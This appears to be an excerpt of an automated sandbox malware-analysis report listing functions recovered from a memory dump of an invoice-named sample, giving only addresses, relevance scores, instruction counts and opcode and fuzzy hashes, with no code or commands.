                                  • Snapshot File: hcaresult_3_2_19e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 558e6a47df1179389b93d815375856c53a20c8c1f46ff41474b6f98187c872c5
                                  • Instruction ID: 4226328d281324e601af82400d8f1c0ddae25bb6b466318b4887f5cb0c50da2b
                                  • Opcode Fuzzy Hash: 558e6a47df1179389b93d815375856c53a20c8c1f46ff41474b6f98187c872c5
                                  • Instruction Fuzzy Hash: CA32F070A00B558FEB29CF69C9447BEBBF2BF84704F18411ED58A9B285D735AA02CB50
                                  Function 01ABA118 Relevance: .6, Instructions: 591COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_19e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 2e82f2945b6451bde8b33ec7267458e9dfb6d5537364db17a2a1bc26e645c3b2
                                  • Instruction ID: 3751098bc65bac6dd39af76a9306b74854119def43de02068d1ed845d7572389
                                  • Opcode Fuzzy Hash: 2e82f2945b6451bde8b33ec7267458e9dfb6d5537364db17a2a1bc26e645c3b2
                                  • Instruction Fuzzy Hash: 7322CF742046E18BEB25CF2DC0D43B2BBF9AF44300F08855AD9968F287E735D592DB60
                                  Function 01A34A35 Relevance: .4, Instructions: 423COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_19e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                  • Instruction ID: 44b9d36b7f4b6a8ad970cb6da80b7acc7183acc707f2cd11bd041f42b43e3595
                                  • Opcode Fuzzy Hash: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                  • Instruction Fuzzy Hash: 02F14E71E0021A9BDB15CFA9D994BAEFBF5AF88750F088129F905EB340E774D941CB60
                                  Function 01AA892B Relevance: .4, Instructions: 386COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_19e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 304235cc39481915492ca8af9cbc382322591d1227f69da00308c3d219d2369a
                                  • Instruction ID: 464e9f52f2163df3456e63ddbec8629deb27b5f5e426ff36300977a4fd8f174d
                                  • Opcode Fuzzy Hash: 304235cc39481915492ca8af9cbc382322591d1227f69da00308c3d219d2369a
                                  • Instruction Fuzzy Hash: 3FD10071E0060A8BDF09CF69C841AFEB7F1BF88306F598169D855E7241E73DE9058B60
                                  Function 01A165D0 Relevance: .4, Instructions: 383COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_19e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: ff8095c3e7cdddcf4afd1773cc34e72b5bca142ff8950ffa1b141f9c857bed50
                                  • Instruction ID: d2b4eae32524d047ab74d76a78a696babf11abb10951ba1234e5779c4c59b251
                                  • Opcode Fuzzy Hash: ff8095c3e7cdddcf4afd1773cc34e72b5bca142ff8950ffa1b141f9c857bed50
                                  • Instruction Fuzzy Hash: EDE19971608342CFC715CF28C580A6ABBE1BF89314F058A6DE999CB355EB71E905CB92
                                  Function 01A08397 Relevance: .4, Instructions: 380COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_19e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 75a40aa5d433f152315853537eea318262635acff9ff58dd170b037ed5a7bb4d
                                  • Instruction ID: a162c751280e4d3845b4acbd90d2de5aaf7979ceb6cab95b7de13efc6a1a7267
                                  • Opcode Fuzzy Hash: 75a40aa5d433f152315853537eea318262635acff9ff58dd170b037ed5a7bb4d
                                  • Instruction Fuzzy Hash: 27D1F271F006069BCB16DF28D980ABA77B5FF54304F09422DEA16DB2C1EB38E954CB64
                                  Function 01A98243 Relevance: .3, Instructions: 322COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_19e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                  • Instruction ID: 90aa5b541b364e7145d7db01924e9ef3ff6cde52b8a4a555083ab9aa4a4229cf
                                  • Opcode Fuzzy Hash: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                  • Instruction Fuzzy Hash: ADB19374A007099FDF24DF98C940AABBBF9FF86304F10446DAA52D7794DA38E985CB10
                                  Function 01A20535 Relevance: .3, Instructions: 300COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_19e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                  • Instruction ID: e3b77666c64ad3ada1d9161a067f717c6e1a9c841d52631390a386691b854856
                                  • Opcode Fuzzy Hash: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                  • Instruction Fuzzy Hash: CCB14B316006569FDB26DB6CCA50BBEBBF6AF88310F184559E552D7381DB30EE41CB90
                                  Function 01A183C0 Relevance: .3, Instructions: 281COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_19e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 6795c353657793656dca29bffdc0c16318ebbe65b596a6965286e6d3ce269bbe
                                  • Instruction ID: 2c267309694e20a2210d90186a3dca912ef42a49ab42ad0824f4cc943529c9ee
                                  • Opcode Fuzzy Hash: 6795c353657793656dca29bffdc0c16318ebbe65b596a6965286e6d3ce269bbe
                                  • Instruction Fuzzy Hash: 17C147751083418FE764CF29C484BABBBE5FF98304F44496DE98987295D778EA08CF92
                                  Function 01A0C427 Relevance: .3, Instructions: 280COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_19e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 17f771c3c82b54d19cc4df4864161c120c0aee33181c0417cbc322e8310415ed
                                  • Instruction ID: 990d6842b1ecaa98fe1849f235913df63621e91f07d0f56c42c6c9fac54ae375
                                  • Opcode Fuzzy Hash: 17f771c3c82b54d19cc4df4864161c120c0aee33181c0417cbc322e8310415ed
                                  • Instruction Fuzzy Hash: 04B19174A002668BDB35CF68D980BA9B3F5EF44710F0486E9D50AE7295EB31ED85CF20
                                  Function 01A3E5E7 Relevance: .3, Instructions: 278COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_19e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 039a0e60f2f293cbd2440bb2a1115788d19f548a0c173e124abb74dfaa7beb86
                                  • Instruction ID: 8d30035a49e8fcf389a6ef93ef716c756a92fb8b48fd79c677dbead994c86fa7
                                  • Opcode Fuzzy Hash: 039a0e60f2f293cbd2440bb2a1115788d19f548a0c173e124abb74dfaa7beb86
                                  • Instruction Fuzzy Hash: E2A10471E00619AFEF22DB98CD44BAEBBB4AF84754F050125FA20AB291D7749E41CBD1
                                  Function 01A50185 Relevance: .3, Instructions: 276COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_19e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 125c751082ac295feb77df5713d399e16bc110d5a2b90b088d38edb5b9a262da
                                  • Instruction ID: ab76887d3c79d7920157946d544e51d77d903d14acd4fa8e2600f36cafd408fd
                                  • Opcode Fuzzy Hash: 125c751082ac295feb77df5713d399e16bc110d5a2b90b088d38edb5b9a262da
                                  • Instruction Fuzzy Hash: 0DA1C070B046169FDB65DF69CA90BBABBB5FF54318F044029FE4597282EB34E801CB90
                                  Function 01AE4500 Relevance: .3, Instructions: 275COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_19e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 62930a932e14149a92906640497b1a2bb0664d486fa0c29ef338a20cc14ed8c8
                                  • Instruction ID: 7e02455a096ab3262946c215dbbb4c5f52bd95271e44f1906198f191b4b5965d
                                  • Opcode Fuzzy Hash: 62930a932e14149a92906640497b1a2bb0664d486fa0c29ef338a20cc14ed8c8
                                  • Instruction Fuzzy Hash: 48A1C872A04612AFC726DF28CA84B6ABBE9FF5C704F450929F589DB651C334ED00CB91
                                  Function 01AE2B57 Relevance: .3, Instructions: 266COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_19e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 6ce3715ed4799cd0a993ea830d382c3077ea0590534c70b07cf682ff4d409637
                                  • Instruction ID: bd67b228b036d01b0c1c51b183b2430e46b497d76255a0a533ddb42748ac0102
                                  • Opcode Fuzzy Hash: 6ce3715ed4799cd0a993ea830d382c3077ea0590534c70b07cf682ff4d409637
                                  • Instruction Fuzzy Hash: 94B12A71E0061ADFDF19CFA9C884BADBBF9BF88310F14816AE914A7354D730A955CB90
                                  Function 01A960E0 Relevance: .3, Instructions: 264COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_19e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 98bd1d391e13a6254d35f5822a6a79e3538da7b51fcb56e1a46cd9f7a65284fd
                                  • Instruction ID: 732b5b0231ed3501725a600504d645b709b6f4221f8488e117acfbbe6e6bc0a1
                                  • Opcode Fuzzy Hash: 98bd1d391e13a6254d35f5822a6a79e3538da7b51fcb56e1a46cd9f7a65284fd
                                  • Instruction Fuzzy Hash: 92917171D00216AFDF15CFA9D884BBEBBF5AF48710F154169E618EB341D734D9809BA0
                                  Function 01A2E3F0 Relevance: .3, Instructions: 261COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_19e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 572086ff82ce0b33121a54a8bf6fed10962710a1e526937d52d7b760438c68a8
                                  • Instruction ID: 48c13d3253bff528c7180c0873d0bc09ff2b9c5369e2c1db11fd779c825e223b
                                  • Opcode Fuzzy Hash: 572086ff82ce0b33121a54a8bf6fed10962710a1e526937d52d7b760438c68a8
                                  • Instruction Fuzzy Hash: 7A911631A00626CBEB25DB6DC940BBE7BB2EF94724F09806AED05DB391E734D981C751
                                  Function 01A66ACC Relevance: .2, Instructions: 226COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_19e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 9e27f0183c1ea592087ec47b7fa17828ab56c0e6a2342483ec6add553507ae92
                                  • Instruction ID: 47a119a546d5de00dfbec089ac16acd3714168c1d46c82f4665b16a0d4dafadf
                                  • Opcode Fuzzy Hash: 9e27f0183c1ea592087ec47b7fa17828ab56c0e6a2342483ec6add553507ae92
                                  • Instruction Fuzzy Hash: C98194B1E00616DBDB18CF6AC940ABEBBF9FB48710F14852EE559D7640E334D940CB94
                                  Function 01ADAB40 Relevance: .2, Instructions: 222COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_19e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                  • Instruction ID: 0ecee4c767c8df7b7f035703690890d48b0f053a1a742777a53771bf29e35bed
                                  • Opcode Fuzzy Hash: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                  • Instruction Fuzzy Hash: 7A819131A006099FDF19CF99C980ABEBBF6FF84310F188569D9169B384D734EA05CB40
                                  Function 01A4E284 Relevance: .2, Instructions: 212COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_19e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 520490c030f3eca77160bcfd44576c9dd9deb94d18657b552fc6183fa587036d
                                  • Instruction ID: 8573139f67149faaa5159ea2da67883cfaf81d8768ec71d39863eb3edd2d2b4a
                                  • Opcode Fuzzy Hash: 520490c030f3eca77160bcfd44576c9dd9deb94d18657b552fc6183fa587036d
                                  • Instruction Fuzzy Hash: 61818071A00609EFDB26DFA9C980BEEBBF9FF88314F144429E555A7250D734AC45CB60
                                  Function 01A2C640 Relevance: .2, Instructions: 206COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_19e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: de367f32a0f4440a07641656c7ab8da7a62885c1198dbb89b48982e87f16dfd2
                                  • Instruction ID: 46721cb3243b94f181a2ae4f0499cbeaeee44dd1c1356d152f3ad9476f013ed0
                                  • Opcode Fuzzy Hash: de367f32a0f4440a07641656c7ab8da7a62885c1198dbb89b48982e87f16dfd2
                                  • Instruction Fuzzy Hash: 6D71DFB5D00625DFCB26CF59C9947BEBBB1FF58720F18411AE942AB355E3389904CBA0
                                  Function 01AC47A0 Relevance: .2, Instructions: 202COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_19e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 58b9d1834618303199fce2d6e11170139c9daa3d7639318f7c36a9bb7f3f4062
                                  • Instruction ID: 8cb4fc7c2ce4873173406a13d4cb51b40c293278566b14161afe601e1653010a
                                  • Opcode Fuzzy Hash: 58b9d1834618303199fce2d6e11170139c9daa3d7639318f7c36a9bb7f3f4062
                                  • Instruction Fuzzy Hash: 9A7192B1900205EFDB25DF9DDA54A9ABFF8FFA8B10F10425EE614E7258D7318940CB58
                                  Function 01A2260B Relevance: .2, Instructions: 201COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_19e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: bbeaa0607f66a5d9732daa8751707e1d7f8abd8428dc73060674c3ed9609cbdc
                                  • Instruction ID: 696b2cd6e58b7b917ad5124b4684eb3c844c57cebfbbfa843324e69565b70c08
                                  • Opcode Fuzzy Hash: bbeaa0607f66a5d9732daa8751707e1d7f8abd8428dc73060674c3ed9609cbdc
                                  • Instruction Fuzzy Hash: 8471E5326046528FD326DF2CC484B6AB7E5FF88310F0885AAE899CB356DB34DD45CB91
                                  Function 01A9035C Relevance: .2, Instructions: 198COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_19e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                  • Instruction ID: d4a544c2cb289714674fdc759430c5d64f99adf76a079c48329b432fc43436d5
                                  • Opcode Fuzzy Hash: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                  • Instruction Fuzzy Hash: 75716C71E0061AAFDF10DFA9CA84AAEBBF8FF48750F104569E505E7250DB34EA45CB50
                                  Function 01AA62A0 Relevance: .2, Instructions: 198COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_19e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: e4daa717802acf376447e87d97aad272c8ac3079fae0a988410f903ae8d3d850
                                  • Instruction ID: 348cad1e78c62c342d773c594b8f321955f97e70b7a357524b80989d41a15d7b
                                  • Opcode Fuzzy Hash: e4daa717802acf376447e87d97aad272c8ac3079fae0a988410f903ae8d3d850
                                  • Instruction Fuzzy Hash: 3C710272200B01EFE7329F18CA44F66BBB6EF44720F594418E61A872A1D775E945CF50
                                  Function 01A18AA0 Relevance: .2, Instructions: 197COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_19e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 83b8598246609a9857faff5011d7c30476dfd477aba773e1615c2f3b2e47df15
                                  • Instruction ID: a31fae8d9dac405e750dbd46956a896be9944cf895539a70bd39165da34a4213
                                  • Opcode Fuzzy Hash: 83b8598246609a9857faff5011d7c30476dfd477aba773e1615c2f3b2e47df15
                                  • Instruction Fuzzy Hash: 2781C272A08315CFDB25DF98D984BADBBB1BF58310F19412EDA04AB285C778DE40CB94
                                  Function 01AE8324 Relevance: .2, Instructions: 192COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_19e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c9b019e6215f754290cc7b546608e0d4eabd581d84b07638b7e9ad855669feec
                                  • Instruction ID: 2477d883e742617a8ee406a699f7613efac399638884e353a1c31081ee8353d8
                                  • Opcode Fuzzy Hash: c9b019e6215f754290cc7b546608e0d4eabd581d84b07638b7e9ad855669feec
                                  • Instruction Fuzzy Hash: 20711B71E0021AAFDF16DF94C945FEEBBB8FF04350F104129EA10A7290E774AA45CBA0
                                  Function 01ACA250 Relevance: .2, Instructions: 184COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_19e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 8b451b150af43bd42c2a53bbad45869cdca9cc7f9ec87c1519c5231c2de9884c
                                  • Instruction ID: 6112894754c16e813215cd424ff45705b782f4f9978fe31e822854ea99b0637e
                                  • Opcode Fuzzy Hash: 8b451b150af43bd42c2a53bbad45869cdca9cc7f9ec87c1519c5231c2de9884c
                                  • Instruction Fuzzy Hash: AE51C272504716AFD711DE68C944E6BFBE9EBC8B50F00452DBA41DB150E730DD04C792
                                  Function 01AB8350 Relevance: .2, Instructions: 161COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_19e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 96017b948247d701cf1c891a20daff4c599ca8c4921b6c4d05c29bc8ffa28b96
                                  • Instruction ID: e79a9021fcf0e1f6399b0c18d0bbeb417fc7c0749eee8593cbd4c24850c7c5d5
                                  • Opcode Fuzzy Hash: 96017b948247d701cf1c891a20daff4c599ca8c4921b6c4d05c29bc8ffa28b96
                                  • Instruction Fuzzy Hash: E951AD709007459BD721CFAAC980AABFBFCBF94710F10461ED252576A2C7B8A545CB50
                                  Function 01A4E443 Relevance: .2, Instructions: 158COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_19e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: f6c90bad0b48bacb84b96da978b9130036a26b8214ebe78a317eac8584a7fc45
                                  • Instruction ID: de9161410d7382a731c6abc6dd7388abdd64829b72e87cca951014f8ed5bc28d
                                  • Opcode Fuzzy Hash: f6c90bad0b48bacb84b96da978b9130036a26b8214ebe78a317eac8584a7fc45
                                  • Instruction Fuzzy Hash: 9C519E71200A15DFCB22EF69CA80F6AB3F9FF58754F40046AE64297661E738ED44CB50
                                  Function 01AB4180 Relevance: .2, Instructions: 156COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_19e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 1bb815de7d0705616607ccc8c98beb67c893b718ea4d3fb2350989d752283e9d
                                  • Instruction ID: 5f39664bae9af4aae6867f533171203522524c24ecf6f52da2de91f55fe07232
                                  • Opcode Fuzzy Hash: 1bb815de7d0705616607ccc8c98beb67c893b718ea4d3fb2350989d752283e9d
                                  • Instruction Fuzzy Hash: B3517B716083829FD754DF29C980AABBBE9FFC8204F48492DF59AC7252E730D905CB52
                                  Function 01A345B1 Relevance: .2, Instructions: 156COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_19e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                                  • Instruction ID: 3da81eddada71b575219ee4cfdc0a8eab3d31ae87627321651b0f687b1724359
                                  • Opcode Fuzzy Hash: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                                  • Instruction Fuzzy Hash: 69518271E0021AABDF16DF98C941BFEBBB5AF89754F044069EA01AB340D774DE44CBA0
                                  Function 01A9E9E0 Relevance: .2, Instructions: 154COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_19e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b631fe1f52208cb18c131e5291272d5615ec6cd8030edbb8dd5fe07777775a1e
                                  • Instruction ID: f2308a1f87ab8a6aae338fd5199054bef4f5ff41214c5765a3f40e2447812c93
                                  • Opcode Fuzzy Hash: b631fe1f52208cb18c131e5291272d5615ec6cd8030edbb8dd5fe07777775a1e
                                  • Instruction Fuzzy Hash: F451C971D0021AEFEF21DF94C994FAEBBF5AF00324F158665D91267292D7349E84CBA0
                                  Function 01AD8B28 Relevance: .2, Instructions: 152COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_19e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: bccb2b99b587bf8f7b3beec03b86896098757c5131839373117810610dd701d0
                                  • Instruction ID: 6626f766a244efc9c8cd1c2c179a0fd2d19f29da3ae94652c0485299bebb6723
